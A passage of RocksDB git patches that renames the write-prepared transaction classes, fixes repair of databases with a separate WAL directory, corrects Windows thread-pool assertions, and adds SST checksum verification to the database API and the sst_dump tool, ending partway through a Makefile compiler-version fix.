LockMapStripe* stripe, LockMap* lock_map, Env* env); - bool IncrementWaiters(const PessimisticTxn* txn, + bool IncrementWaiters(const PessimisticTransaction* txn, const autovector& wait_ids); - void DecrementWaiters(const PessimisticTxn* txn, + void DecrementWaiters(const PessimisticTransaction* txn, const autovector& wait_ids); - void DecrementWaitersImpl(const PessimisticTxn* txn, + void DecrementWaitersImpl(const PessimisticTransaction* txn, const autovector& wait_ids); // No copying allowed diff --git a/utilities/transactions/write_prepared_transaction_impl.cc b/utilities/transactions/write_prepared_txn.cc similarity index 63% rename from utilities/transactions/write_prepared_transaction_impl.cc rename to utilities/transactions/write_prepared_txn.cc index c018e946047..f3942855bf2 100644 --- a/utilities/transactions/write_prepared_transaction_impl.cc +++ b/utilities/transactions/write_prepared_txn.cc @@ -5,56 +5,54 @@ #ifndef ROCKSDB_LITE -#include "utilities/transactions/write_prepared_transaction_impl.h" +#include "utilities/transactions/write_prepared_txn.h" #include -#include -#include -#include #include "db/column_family.h" #include "db/db_impl.h" -#include "rocksdb/comparator.h" #include "rocksdb/db.h" -#include "rocksdb/snapshot.h" #include "rocksdb/status.h" #include "rocksdb/utilities/transaction_db.h" -#include "util/string_util.h" -#include "util/sync_point.h" #include "utilities/transactions/pessimistic_transaction_db.h" -#include "utilities/transactions/transaction_impl.h" -#include "utilities/transactions/transaction_util.h" +#include "utilities/transactions/pessimistic_transaction.h" namespace rocksdb { struct WriteOptions; -WritePreparedTxnImpl::WritePreparedTxnImpl( +WritePreparedTxn::WritePreparedTxn( TransactionDB* txn_db, const WriteOptions& write_options, const TransactionOptions& txn_options) - : PessimisticTxn(txn_db, write_options, txn_options) { - PessimisticTxn::Initialize(txn_options); + : PessimisticTransaction(txn_db, write_options, txn_options) { 
+ PessimisticTransaction::Initialize(txn_options); } -Status WritePreparedTxnImpl::CommitBatch(WriteBatch* batch) { +Status WritePreparedTxn::CommitBatch(WriteBatch* /* unused */) { // TODO(myabandeh) Implement this throw std::runtime_error("CommitBatch not Implemented"); return Status::OK(); } -Status WritePreparedTxnImpl::Prepare() { +Status WritePreparedTxn::PrepareInternal() { // TODO(myabandeh) Implement this throw std::runtime_error("Prepare not Implemented"); return Status::OK(); } -Status WritePreparedTxnImpl::Commit() { +Status WritePreparedTxn::CommitWithoutPrepareInternal() { // TODO(myabandeh) Implement this throw std::runtime_error("Commit not Implemented"); return Status::OK(); } -Status WritePreparedTxnImpl::Rollback() { +Status WritePreparedTxn::CommitInternal() { + // TODO(myabandeh) Implement this + throw std::runtime_error("Commit not Implemented"); + return Status::OK(); +} + +Status WritePreparedTxn::Rollback() { // TODO(myabandeh) Implement this throw std::runtime_error("Rollback not Implemented"); return Status::OK(); diff --git a/utilities/transactions/write_prepared_transaction_impl.h b/utilities/transactions/write_prepared_txn.h similarity index 77% rename from utilities/transactions/write_prepared_transaction_impl.h rename to utilities/transactions/write_prepared_txn.h index eab2b8669f7..c0feb2207e3 100644 --- a/utilities/transactions/write_prepared_transaction_impl.h +++ b/utilities/transactions/write_prepared_txn.h @@ -26,7 +26,7 @@ #include "rocksdb/utilities/write_batch_with_index.h" #include "util/autovector.h" #include "utilities/transactions/transaction_base.h" -#include "utilities/transactions/transaction_impl.h" +#include "utilities/transactions/pessimistic_transaction.h" #include "utilities/transactions/transaction_util.h" namespace rocksdb { @@ -35,24 +35,26 @@ class TransactionDBImpl; // This impl could write to DB also uncomitted data and then later tell apart // committed data from uncomitted data. Uncommitted data could be after the -// Prepare phase in 2PC (WritePreparedTxnImpl) or before that +// Prepare phase in 2PC (WritePreparedTxn) or before that // (WriteUnpreparedTxnImpl). -class WritePreparedTxnImpl : public PessimisticTxn { +class WritePreparedTxn : public PessimisticTransaction { public: - WritePreparedTxnImpl(TransactionDB* db, const WriteOptions& write_options, + WritePreparedTxn(TransactionDB* db, const WriteOptions& write_options, const TransactionOptions& txn_options); - virtual ~WritePreparedTxnImpl() {} - - Status Prepare() override; - - Status Commit() override; + virtual ~WritePreparedTxn() {} Status CommitBatch(WriteBatch* batch) override; Status Rollback() override; private: + Status PrepareInternal() override; + + Status CommitWithoutPrepareInternal() override; + + Status CommitInternal() override; + // TODO(myabandeh): verify that the current impl work with values being // written with prepare sequence number too. 
// Status ValidateSnapshot(ColumnFamilyHandle* column_family, const Slice& @@ -61,8 +63,8 @@ class WritePreparedTxnImpl : public PessimisticTxn { // new_seqno); // No copying allowed - WritePreparedTxnImpl(const WritePreparedTxnImpl&); - void operator=(const WritePreparedTxnImpl&); + WritePreparedTxn(const WritePreparedTxn&); + void operator=(const WritePreparedTxn&); }; } // namespace rocksdb From 36375de76fb2b5a43d33154d0754551b1f71544f Mon Sep 17 00:00:00 2001 From: James Page Date: Tue, 8 Aug 2017 08:45:28 -0700 Subject: [PATCH 085/205] gcc-7/i386: markup intentional fallthroughs Summary: Markup i386 code paths resolving compilation failure under i386 with gcc-7. Signed-off-by: James Page Closes https://github.com/facebook/rocksdb/pull/2700 Differential Revision: D5583047 Pulled By: maysamyabandeh fbshipit-source-id: fe31bcfeaf7cd2d3f51b55f5ae0b3b0cb3788fbc --- util/murmurhash.cc | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/util/murmurhash.cc b/util/murmurhash.cc index 334ed898ea1..4d71d589080 100644 --- a/util/murmurhash.cc +++ b/util/murmurhash.cc @@ -113,8 +113,8 @@ unsigned int MurmurHash2 ( const void * key, int len, unsigned int seed ) switch(len) { - case 3: h ^= data[2] << 16; - case 2: h ^= data[1] << 8; + case 3: h ^= data[2] << 16; // fallthrough + case 2: h ^= data[1] << 8; // fallthrough case 1: h ^= data[0]; h *= m; }; From d97a72d63fb763ff0dfd11f610b3877180f3e99e Mon Sep 17 00:00:00 2001 From: Chang Liu Date: Tue, 8 Aug 2017 10:42:38 -0700 Subject: [PATCH 086/205] Try to repair db with wal_dir option, avoid leaking some WAL files Summary: We should search wal_dir in the Repairer::FindFiles function, and avoid using LogFileName(dbname, number) to get the WAL file's name, which would produce a wrong WAL filename, as in the following: ``` [WARN] [/home/liuchang/Workspace/rocksdb/db/repair.cc:310] Log #3: ignoring conversion error: IO error: While opening a file for sequentially reading: /tmp/rocksdbtest-1000/repair_test/000003.log: No such file or directory ``` I have added a new test case to repair_test.cc, which tries to repair the db with all WAL options.
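For illustration, here is a minimal sketch (not part of the patch) of the failure scenario the new test covers; the paths and the key/value below are made up for the example:

```
#include "rocksdb/db.h"
#include "rocksdb/options.h"

// Sketch only: a DB whose WALs live in a separate wal_dir. Before this
// patch, RepairDB() searched for *.log files under dbname instead of
// options.wal_dir, so unflushed data sitting in the WAL could be lost.
int main() {
  rocksdb::Options options;
  options.create_if_missing = true;
  options.wal_dir = "/tmp/repair_example_wal";  // WALs outside the db dir

  rocksdb::DB* db;
  rocksdb::Status s = rocksdb::DB::Open(options, "/tmp/repair_example", &db);
  if (s.ok()) {
    s = db->Put(rocksdb::WriteOptions(), "key", "val");
    delete db;  // close while "key" is still only in the memtable/WAL
  }

  // If the MANIFEST is then lost, RepairDB() has to scan wal_dir so that
  // it can convert the WALs found there into SST files.
  s = rocksdb::RepairDB("/tmp/repair_example", options);
  return s.ok() ? 0 : 1;
}
```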
Signed-off-by: Chang Liu Closes https://github.com/facebook/rocksdb/pull/2692 Differential Revision: D5575888 Pulled By: ajkr fbshipit-source-id: 5b93e9f85cddc01663ccecd87631fa723ac466a3 --- db/db_impl.cc | 2 +- db/repair.cc | 22 +++++++++++++++++----- db/repair_test.cc | 34 ++++++++++++++++++++++++++++++++++ 3 files changed, 52 insertions(+), 6 deletions(-) diff --git a/db/db_impl.cc b/db/db_impl.cc index 86bb4a43381..5abd632c03f 100644 --- a/db/db_impl.cc +++ b/db/db_impl.cc @@ -2298,7 +2298,7 @@ Status DestroyDB(const std::string& dbname, const Options& options) { // Delete log files in the WAL dir for (const auto& file : walDirFiles) { if (ParseFileName(file, &number, &type) && type == kLogFile) { - Status del = env->DeleteFile(soptions.wal_dir + "/" + file); + Status del = env->DeleteFile(LogFileName(soptions.wal_dir, number)); if (result.ok() && !del.ok()) { result = del; } diff --git a/db/repair.cc b/db/repair.cc index c248e6f43c4..9ed326032cb 100644 --- a/db/repair.cc +++ b/db/repair.cc @@ -176,6 +176,7 @@ class Repairer { status = db_impl->NewDB(); delete db_impl; } + if (status.ok()) { // Recover using the fresh manifest created by NewDB() status = @@ -246,9 +247,21 @@ class Repairer { Status FindFiles() { std::vector<std::string> filenames; bool found_file = false; + std::vector<std::string> to_search_paths; + for (size_t path_id = 0; path_id < db_options_.db_paths.size(); path_id++) { + to_search_paths.push_back(db_options_.db_paths[path_id].path); + } + + // Also search wal_dir if the user uses a customized wal_dir + if (!db_options_.wal_dir.empty() && + db_options_.wal_dir != dbname_) { + to_search_paths.push_back(db_options_.wal_dir); + } + + for (size_t path_id = 0; path_id < to_search_paths.size(); path_id++) { Status status = - env_->GetChildren(db_options_.db_paths[path_id].path, &filenames); + env_->GetChildren(to_search_paths[path_id], &filenames); if (!status.ok()) { return status; } @@ -261,14 +274,12 @@ class Repairer { for (size_t i = 0; i < filenames.size(); i++) { if (ParseFileName(filenames[i], &number, &type)) { if (type == kDescriptorFile) { - assert(path_id == 0); manifests_.push_back(filenames[i]); } else { if (number + 1 > next_file_number_) { next_file_number_ = number + 1; } if (type == kLogFile) { - assert(path_id == 0); logs_.push_back(number); } else if (type == kTableFile) { table_fds_.emplace_back(number, static_cast<uint32_t>(path_id), @@ -288,7 +299,8 @@ class Repairer { void ConvertLogFilesToTables() { for (size_t i = 0; i < logs_.size(); i++) { - std::string logname = LogFileName(dbname_, logs_[i]); + // Use LogFileName(wal_dir, logs_[i]) here, since the user might have set the wal_dir option.
+ std::string logname = LogFileName(db_options_.wal_dir, logs_[i]); Status status = ConvertLogToTable(logs_[i]); if (!status.ok()) { ROCKS_LOG_WARN(db_options_.info_log, @@ -312,7 +324,7 @@ class Repairer { }; // Open the log file - std::string logname = LogFileName(dbname_, log); + std::string logname = LogFileName(db_options_.wal_dir, log); unique_ptr lfile; Status status = env_->NewSequentialFile( logname, &lfile, env_->OptimizeForLogRead(env_options_)); diff --git a/db/repair_test.cc b/db/repair_test.cc index 226e4e6d063..b267c6d1683 100644 --- a/db/repair_test.cc +++ b/db/repair_test.cc @@ -174,6 +174,40 @@ TEST_F(RepairTest, UnflushedSst) { ASSERT_EQ(Get("key"), "val"); } +TEST_F(RepairTest, SeparateWalDir) { + do { + Options options = CurrentOptions(); + DestroyAndReopen(options); + Put("key", "val"); + Put("foo", "bar"); + VectorLogPtr wal_files; + ASSERT_OK(dbfull()->GetSortedWalFiles(wal_files)); + ASSERT_EQ(wal_files.size(), 1); + uint64_t total_ssts_size; + GetAllSSTFiles(&total_ssts_size); + ASSERT_EQ(total_ssts_size, 0); + std::string manifest_path = + DescriptorFileName(dbname_, dbfull()->TEST_Current_Manifest_FileNo()); + + Close(); + ASSERT_OK(env_->FileExists(manifest_path)); + ASSERT_OK(env_->DeleteFile(manifest_path)); + ASSERT_OK(RepairDB(dbname_, options)); + + // make sure that all WALs are converted to SSTables. + options.wal_dir = ""; + + Reopen(options); + ASSERT_OK(dbfull()->GetSortedWalFiles(wal_files)); + ASSERT_EQ(wal_files.size(), 0); + GetAllSSTFiles(&total_ssts_size); + ASSERT_GT(total_ssts_size, 0); + ASSERT_EQ(Get("key"), "val"); + ASSERT_EQ(Get("foo"), "bar"); + + } while(ChangeWalOptions()); +} + TEST_F(RepairTest, RepairMultipleColumnFamilies) { // Verify repair logic associates SST files with their original column // families. 
From 47ed3bfc3b897114172b39571235069fe8feaa33 Mon Sep 17 00:00:00 2001 From: Andrew Kryczka Date: Tue, 8 Aug 2017 17:16:14 -0700 Subject: [PATCH 087/205] fix WinEnv assertions Summary: Closes https://github.com/facebook/rocksdb/pull/2702 Differential Revision: D5585389 Pulled By: ajkr fbshipit-source-id: cb54041eb481d0d759c440f82a8a2c5b34534173 --- port/win/env_win.cc | 10 +++++----- 1 file changed, 5 insertions(+), 5 deletions(-) diff --git a/port/win/env_win.cc b/port/win/env_win.cc index 1e7ea0cb8dc..462148893b3 100644 --- a/port/win/env_win.cc +++ b/port/win/env_win.cc @@ -829,7 +829,7 @@ WinEnvThreads::~WinEnvThreads() { void WinEnvThreads::Schedule(void(*function)(void*), void* arg, Env::Priority pri, void* tag, void(*unschedFunction)(void* arg)) { - assert(pri >= Env::Priority::LOW && pri <= Env::Priority::HIGH); + assert(pri >= Env::Priority::BOTTOM && pri <= Env::Priority::HIGH); thread_pools_[pri].Schedule(function, arg, tag, unschedFunction); } @@ -878,7 +878,7 @@ void WinEnvThreads::WaitForJoin() { } unsigned int WinEnvThreads::GetThreadPoolQueueLen(Env::Priority pri) const { - assert(pri >= Env::Priority::LOW && pri <= Env::Priority::HIGH); + assert(pri >= Env::Priority::BOTTOM && pri <= Env::Priority::HIGH); return thread_pools_[pri].GetQueueLen(); } @@ -894,17 +894,17 @@ void WinEnvThreads::SleepForMicroseconds(int micros) { } void WinEnvThreads::SetBackgroundThreads(int num, Env::Priority pri) { - assert(pri >= Env::Priority::LOW && pri <= Env::Priority::HIGH); + assert(pri >= Env::Priority::BOTTOM && pri <= Env::Priority::HIGH); thread_pools_[pri].SetBackgroundThreads(num); } int WinEnvThreads::GetBackgroundThreads(Env::Priority pri) { - assert(pri >= Env::Priority::LOW && pri <= Env::Priority::HIGH); + assert(pri >= Env::Priority::BOTTOM && pri <= Env::Priority::HIGH); return thread_pools_[pri].GetBackgroundThreads(); } void WinEnvThreads::IncBackgroundThreadsIfNeeded(int num, Env::Priority pri) { - assert(pri >= Env::Priority::LOW && pri <= Env::Priority::HIGH); + assert(pri >= Env::Priority::BOTTOM && pri <= Env::Priority::HIGH); thread_pools_[pri].IncBackgroundThreadsIfNeeded(num); } From 7848f0b24c91637a771b73a78ddbc2d638c65fa3 Mon Sep 17 00:00:00 2001 From: Aaron G Date: Wed, 9 Aug 2017 15:49:40 -0700 Subject: [PATCH 088/205] add VerifyChecksum() to db.h Summary: We need a tool to check any sst file corruption in the db. It will check all the sst files in current version and read all the blocks (data, meta, index) with checksum verification. If any verification fails, the function will return non-OK status. 
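To illustrate, a minimal usage sketch (not part of the patch; the two wrapper functions are hypothetical, but `DB::VerifyChecksum()` and `VerifySstFileChecksum()` are the entry points this change adds):

```
#include <string>

#include "rocksdb/convenience.h"
#include "rocksdb/db.h"
#include "rocksdb/env.h"
#include "rocksdb/options.h"

// Sketch only. Both entry points return a non-OK Status on the first
// checksum mismatch they encounter.

// Walks every SST file in the current version and verifies all of its
// data, meta and index blocks.
rocksdb::Status CheckWholeDb(rocksdb::DB* db) {
  return db->VerifyChecksum();
}

// Stand-alone check of a single SST file, also exposed through
// `sst_dump --command=verify`.
rocksdb::Status CheckOneFile(const std::string& sst_path) {
  rocksdb::Options options;
  rocksdb::EnvOptions env_options;
  return rocksdb::VerifySstFileChecksum(options, env_options, sst_path);
}
```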
Closes https://github.com/facebook/rocksdb/pull/2498 Differential Revision: D5324269 Pulled By: lightmark fbshipit-source-id: 6f8a272008b722402a772acfc804524c9d1a483b --- db/convenience.cc | 29 +++++++++++++ db/corruption_test.cc | 10 +++++ db/db_impl.cc | 50 +++++++++++++++++++++ db/db_impl.h | 2 + db/db_test.cc | 4 ++ include/rocksdb/convenience.h | 5 +++ include/rocksdb/db.h | 2 + include/rocksdb/utilities/stackable_db.h | 2 + table/block_based_table_reader.cc | 55 +++++++++++++++++++++++- table/block_based_table_reader.h | 4 ++ table/table_reader.h | 5 +++ tools/sst_dump_tool.cc | 18 +++++++- tools/sst_dump_tool_imp.h | 1 + 13 files changed, 185 insertions(+), 2 deletions(-) diff --git a/db/convenience.cc b/db/convenience.cc index e3e7165b463..8ee31cacab5 100644 --- a/db/convenience.cc +++ b/db/convenience.cc @@ -24,6 +24,35 @@ Status DeleteFilesInRange(DB* db, ColumnFamilyHandle* column_family, ->DeleteFilesInRange(column_family, begin, end); } +Status VerifySstFileChecksum(const Options& options, + const EnvOptions& env_options, + const std::string& file_path) { + unique_ptr file; + uint64_t file_size; + InternalKeyComparator internal_comparator(options.comparator); + ImmutableCFOptions ioptions(options); + + Status s = ioptions.env->NewRandomAccessFile(file_path, &file, env_options); + if (s.ok()) { + s = ioptions.env->GetFileSize(file_path, &file_size); + } else { + return s; + } + unique_ptr table_reader; + std::unique_ptr file_reader( + new RandomAccessFileReader(std::move(file), file_path)); + s = ioptions.table_factory->NewTableReader( + TableReaderOptions(ioptions, env_options, internal_comparator, + false /* skip_filters */, -1 /* level */), + std::move(file_reader), file_size, &table_reader, + false /* prefetch_index_and_filter_in_cache */); + if (!s.ok()) { + return s; + } + s = table_reader->VerifyChecksum(); + return s; +} + } // namespace rocksdb #endif // ROCKSDB_LITE diff --git a/db/corruption_test.cc b/db/corruption_test.cc index 9f423757959..608c88d597d 100644 --- a/db/corruption_test.cc +++ b/db/corruption_test.cc @@ -20,6 +20,7 @@ #include "db/log_format.h" #include "db/version_set.h" #include "rocksdb/cache.h" +#include "rocksdb/convenience.h" #include "rocksdb/env.h" #include "rocksdb/table.h" #include "rocksdb/write_batch.h" @@ -179,6 +180,9 @@ class CorruptionTest : public testing::Test { } s = WriteStringToFile(Env::Default(), contents, fname); ASSERT_TRUE(s.ok()) << s.ToString(); + Options options; + EnvOptions env_options; + ASSERT_NOK(VerifySstFileChecksum(options, env_options, fname)); } void Corrupt(FileType filetype, int offset, int bytes_to_corrupt) { @@ -312,6 +316,7 @@ TEST_F(CorruptionTest, TableFile) { Corrupt(kTableFile, 100, 1); Check(99, 99); + ASSERT_NOK(dbi->VerifyChecksum()); } TEST_F(CorruptionTest, TableFileIndexData) { @@ -330,6 +335,7 @@ TEST_F(CorruptionTest, TableFileIndexData) { // one full file should be readable, since only one was corrupted // the other file should be fully non-readable, since index was corrupted Check(5000, 5000); + ASSERT_NOK(dbi->VerifyChecksum()); } TEST_F(CorruptionTest, MissingDescriptor) { @@ -389,10 +395,12 @@ TEST_F(CorruptionTest, CompactionInputError) { Corrupt(kTableFile, 100, 1); Check(9, 9); + ASSERT_NOK(dbi->VerifyChecksum()); // Force compactions by writing lots of values Build(10000); Check(10000, 10000); + ASSERT_NOK(dbi->VerifyChecksum()); } TEST_F(CorruptionTest, CompactionInputErrorParanoid) { @@ -424,6 +432,7 @@ TEST_F(CorruptionTest, CompactionInputErrorParanoid) { CorruptTableFileAtLevel(0, 
100, 1); Check(9, 9); + ASSERT_NOK(dbi->VerifyChecksum()); // Write must eventually fail because of corrupted table Status s; @@ -445,6 +454,7 @@ TEST_F(CorruptionTest, UnrelatedKeys) { DBImpl* dbi = reinterpret_cast(db_); dbi->TEST_FlushMemTable(); Corrupt(kTableFile, 100, 1); + ASSERT_NOK(dbi->VerifyChecksum()); std::string tmp1, tmp2; ASSERT_OK(db_->Put(WriteOptions(), Key(1000, &tmp1), Value(1000, &tmp2))); diff --git a/db/db_impl.cc b/db/db_impl.cc index 5abd632c03f..cdba03915af 100644 --- a/db/db_impl.cc +++ b/db/db_impl.cc @@ -67,6 +67,7 @@ #include "port/port.h" #include "rocksdb/cache.h" #include "rocksdb/compaction_filter.h" +#include "rocksdb/convenience.h" #include "rocksdb/db.h" #include "rocksdb/env.h" #include "rocksdb/merge_operator.h" @@ -80,6 +81,7 @@ #include "table/merging_iterator.h" #include "table/table_builder.h" #include "table/two_level_iterator.h" +#include "tools/sst_dump_tool_imp.h" #include "util/auto_roll_logger.h" #include "util/autovector.h" #include "util/build_version.h" @@ -2740,6 +2742,54 @@ Status DBImpl::IngestExternalFile( return status; } +Status DBImpl::VerifyChecksum() { + Status s; + Options options; + EnvOptions env_options; + std::vector cfd_list; + { + InstrumentedMutexLock l(&mutex_); + for (auto cfd : *versions_->GetColumnFamilySet()) { + if (!cfd->IsDropped() && cfd->initialized()) { + cfd->Ref(); + cfd_list.push_back(cfd); + } + } + } + std::vector sv_list; + for (auto cfd : cfd_list) { + sv_list.push_back(cfd->GetReferencedSuperVersion(&mutex_)); + } + for (auto& sv : sv_list) { + VersionStorageInfo* vstorage = sv->current->storage_info(); + for (int i = 0; i < vstorage->num_non_empty_levels() && s.ok(); i++) { + for (size_t j = 0; j < vstorage->LevelFilesBrief(i).num_files && s.ok(); + j++) { + const auto& fd = vstorage->LevelFilesBrief(i).files[j].fd; + std::string fname = TableFileName(immutable_db_options_.db_paths, + fd.GetNumber(), fd.GetPathId()); + s = rocksdb::VerifySstFileChecksum(options, env_options, fname); + } + } + if (!s.ok()) { + break; + } + } + { + InstrumentedMutexLock l(&mutex_); + for (auto sv : sv_list) { + if (sv && sv->Unref()) { + sv->Cleanup(); + delete sv; + } + } + for (auto cfd : cfd_list) { + cfd->Unref(); + } + } + return s; +} + void DBImpl::NotifyOnExternalFileIngested( ColumnFamilyData* cfd, const ExternalSstFileIngestionJob& ingestion_job) { #ifndef ROCKSDB_LITE diff --git a/db/db_impl.h b/db/db_impl.h index d057f934524..31d69a97041 100644 --- a/db/db_impl.h +++ b/db/db_impl.h @@ -293,6 +293,8 @@ class DBImpl : public DB { const std::vector& external_files, const IngestExternalFileOptions& ingestion_options) override; + virtual Status VerifyChecksum() override; + #endif // ROCKSDB_LITE // Similar to GetSnapshot(), but also lets the db know that this snapshot diff --git a/db/db_test.cc b/db/db_test.cc index 8d637e579fb..675c403e5cc 100644 --- a/db/db_test.cc +++ b/db/db_test.cc @@ -2235,6 +2235,10 @@ class ModelDB : public DB { return Status::NotSupported("Not implemented."); } + virtual Status VerifyChecksum() override { + return Status::NotSupported("Not implemented."); + } + using DB::GetPropertiesOfAllTables; virtual Status GetPropertiesOfAllTables( ColumnFamilyHandle* column_family, diff --git a/include/rocksdb/convenience.h b/include/rocksdb/convenience.h index cb0c6f56b5c..4a60afb11dc 100644 --- a/include/rocksdb/convenience.h +++ b/include/rocksdb/convenience.h @@ -329,6 +329,11 @@ void CancelAllBackgroundWork(DB* db, bool wait = false); // Snapshots before the delete might not see the data in 
the given range. Status DeleteFilesInRange(DB* db, ColumnFamilyHandle* column_family, const Slice* begin, const Slice* end); + +// Verify the checksum of file +Status VerifySstFileChecksum(const Options& options, + const EnvOptions& env_options, + const std::string& file_path); #endif // ROCKSDB_LITE } // namespace rocksdb diff --git a/include/rocksdb/db.h b/include/rocksdb/db.h index 692932c35de..078c24b4fa8 100644 --- a/include/rocksdb/db.h +++ b/include/rocksdb/db.h @@ -976,6 +976,8 @@ class DB { return IngestExternalFile(DefaultColumnFamily(), external_files, options); } + virtual Status VerifyChecksum() = 0; + // AddFile() is deprecated, please use IngestExternalFile() ROCKSDB_DEPRECATED_FUNC virtual Status AddFile( ColumnFamilyHandle* column_family, diff --git a/include/rocksdb/utilities/stackable_db.h b/include/rocksdb/utilities/stackable_db.h index d2c0dbd7b7d..991de90aab0 100644 --- a/include/rocksdb/utilities/stackable_db.h +++ b/include/rocksdb/utilities/stackable_db.h @@ -95,6 +95,8 @@ class StackableDB : public DB { return db_->IngestExternalFile(column_family, external_files, options); } + virtual Status VerifyChecksum() override { return db_->VerifyChecksum(); } + using DB::KeyMayExist; virtual bool KeyMayExist(const ReadOptions& options, ColumnFamilyHandle* column_family, const Slice& key, diff --git a/table/block_based_table_reader.cc b/table/block_based_table_reader.cc index a0b58c6b26e..5931692f029 100644 --- a/table/block_based_table_reader.cc +++ b/table/block_based_table_reader.cc @@ -820,7 +820,6 @@ Status BlockBasedTable::ReadMetaBlock(Rep* rep, std::unique_ptr* iter) { // TODO(sanjay): Skip this if footer.metaindex_handle() size indicates // it is an empty block. - // TODO: we never really verify check sum for meta index block std::unique_ptr meta; Status s = ReadBlockFromFile( rep->file.get(), rep->footer, ReadOptions(), @@ -1746,6 +1745,60 @@ Status BlockBasedTable::Prefetch(const Slice* const begin, return Status::OK(); } +Status BlockBasedTable::VerifyChecksum() { + Status s; + // Check Meta blocks + std::unique_ptr meta; + std::unique_ptr meta_iter; + s = ReadMetaBlock(rep_, &meta, &meta_iter); + if (s.ok()) { + s = VerifyChecksumInBlocks(meta_iter.get()); + if (!s.ok()) { + return s; + } + } else { + return s; + } + // Check Data blocks + BlockIter iiter_on_stack; + InternalIterator* iiter = NewIndexIterator(ReadOptions(), &iiter_on_stack); + std::unique_ptr iiter_unique_ptr; + if (iiter != &iiter_on_stack) { + iiter_unique_ptr = std::unique_ptr(iiter); + } + if (!iiter->status().ok()) { + // error opening index iterator + return iiter->status(); + } + s = VerifyChecksumInBlocks(iiter); + return s; +} + +Status BlockBasedTable::VerifyChecksumInBlocks(InternalIterator* index_iter) { + Status s; + for (index_iter->SeekToFirst(); index_iter->Valid(); index_iter->Next()) { + s = index_iter->status(); + if (!s.ok()) { + break; + } + BlockHandle handle; + Slice input = index_iter->value(); + s = handle.DecodeFrom(&input); + if (!s.ok()) { + break; + } + BlockContents contents; + s = ReadBlockContents(rep_->file.get(), rep_->footer, ReadOptions(), + handle, &contents, rep_->ioptions, + false /* decompress */, Slice() /*compression dict*/, + rep_->persistent_cache_options); + if (!s.ok()) { + break; + } + } + return s; +} + bool BlockBasedTable::TEST_KeyInCache(const ReadOptions& options, const Slice& key) { std::unique_ptr iiter(NewIndexIterator(options)); diff --git a/table/block_based_table_reader.h b/table/block_based_table_reader.h index 3acc3a8fb09..3451614c878 
100644 --- a/table/block_based_table_reader.h +++ b/table/block_based_table_reader.h @@ -139,6 +139,8 @@ class BlockBasedTable : public TableReader { // convert SST file to a human readable form Status DumpTable(WritableFile* out_file) override; + Status VerifyChecksum() override; + void Close() override; ~BlockBasedTable(); @@ -310,6 +312,8 @@ class BlockBasedTable : public TableReader { static Status ReadMetaBlock(Rep* rep, std::unique_ptr<Block>* meta_block, std::unique_ptr<InternalIterator>* iter); + Status VerifyChecksumInBlocks(InternalIterator* index_iter); + // Create the filter from the filter block. FilterBlockReader* ReadFilter(const BlockHandle& filter_handle, const bool is_a_filter_partition) const; diff --git a/table/table_reader.h b/table/table_reader.h index 9681d54670e..18fcda27370 100644 --- a/table/table_reader.h +++ b/table/table_reader.h @@ -98,6 +98,11 @@ class TableReader { return Status::NotSupported("DumpTable() not supported"); } + // check whether there is corruption in this db file + virtual Status VerifyChecksum() { + return Status::NotSupported("VerifyChecksum() not supported"); + } + virtual void Close() {} }; diff --git a/tools/sst_dump_tool.cc b/tools/sst_dump_tool.cc index 07f34861233..e6322f8b4d9 100644 --- a/tools/sst_dump_tool.cc +++ b/tools/sst_dump_tool.cc @@ -127,6 +127,10 @@ Status SstFileReader::NewTableReader( std::move(file_), file_size, &table_reader_); } +Status SstFileReader::VerifyChecksum() { + return table_reader_->VerifyChecksum(); +} + Status SstFileReader::DumpTable(const std::string& out_filename) { unique_ptr<WritableFile> out_file; Env* env = Env::Default(); @@ -349,10 +353,11 @@ void print_help() { --file=<data_dir_OR_sst_file> Path to SST file or directory containing SST files - --command=check|scan|raw + --command=check|scan|raw|verify check: Iterate over entries in files but dont print anything except if an error is encounterd (default command) scan: Iterate over entries in files and print them to screen raw: Dump all the table contents to <file_name>_dump.txt + verify: Iterate all the blocks in files verifying checksum to detect possible corruption but don't print anything except if a corruption is encountered --output_hex Can be combined with scan command to print the keys and values in Hex @@ -580,6 +585,17 @@ int SSTDumpTool::Run(int argc, char** argv) { } } + if (command == "verify") { + st = reader.VerifyChecksum(); + if (!st.ok()) { + fprintf(stderr, "%s is corrupted: %s\n", filename.c_str(), + st.ToString().c_str()); + } else { + fprintf(stdout, "The file is ok\n"); + } + continue; + } + if (show_properties || show_summary) { const rocksdb::TableProperties* table_properties; diff --git a/tools/sst_dump_tool_imp.h b/tools/sst_dump_tool_imp.h index 0129d98ebc7..e2b6396071c 100644 --- a/tools/sst_dump_tool_imp.h +++ b/tools/sst_dump_tool_imp.h @@ -30,6 +30,7 @@ class SstFileReader { uint64_t GetReadNumber() { return read_num_; } TableProperties* GetInitTableProperties() { return table_properties_.get(); } + Status VerifyChecksum(); Status DumpTable(const std::string& out_filename); Status getStatus() { return init_result_; } From 1fbad84b69424a1cd5a971514436a3838e5e3cc8 Mon Sep 17 00:00:00 2001 From: Daniel Black Date: Wed, 9 Aug 2017 22:39:46 -0700 Subject: [PATCH 089/205] Makefile: correct faligned-new test Summary: Commit 4f81ab38bf18aacdc5f2e2f2a82cf577989ae39b has the test wrong. clang doesn't support a -dumpversion option. By lucky coincidence clang/gcc --version both place a version number at the same output location when --version is passed. Example output (1st line only).
$ clang --version clang version 3.9.1 (tags/RELEASE_391/final) $ gcc --version gcc (GCC) 6.4.1 20170727 (Red Hat 6.4.1-1) When testing the compiler we ensure that a minimum version is met, as Makefile doesn't support version patterns. Also, Xcode 9 doesn't seem affected by https://github.com/facebook/rocksdb/issues/2672 and doesn't have "clang" as the first part of its output, so the fix implemented here is Apple clang friendly as well. $ clang --version Apple LLVM version 9.0.0 (clang-900.0.31) Signed-off-by: Daniel Black Closes https://github.com/facebook/rocksdb/pull/2699 Differential Revision: D5600818 Pulled By: yiwu-arbug fbshipit-source-id: 3b0f2751becb53c1c35468bf29f3f828e7cf2c2a --- Makefile | 11 ++--------- 1 file changed, 2 insertions(+), 9 deletions(-) diff --git a/Makefile b/Makefile index ef42deecedd..620e7fb2772 100644 --- a/Makefile +++ b/Makefile @@ -259,18 +259,11 @@ default: all WARNING_FLAGS = -W -Wextra -Wall -Wsign-compare -Wshadow \ -Wno-unused-parameter -CCVERSION = $(shell $(CXX) -dumpversion) -CCNAME = $(shell $(CXX) --version | awk 'NR==1' | cut -f1 -d " ") +CCFALIGNED := $(shell $(CXX) --version | awk 'NR==1 { split($$3, ver, "."); if (($$1 == "clang" && ver[1] >= 4) || ($$2 == "(GCC)" && ver[1] >= 7)) { print "yes" } }') -ifeq ($(CCNAME), clang) -ifeq ($(CCVERSION), 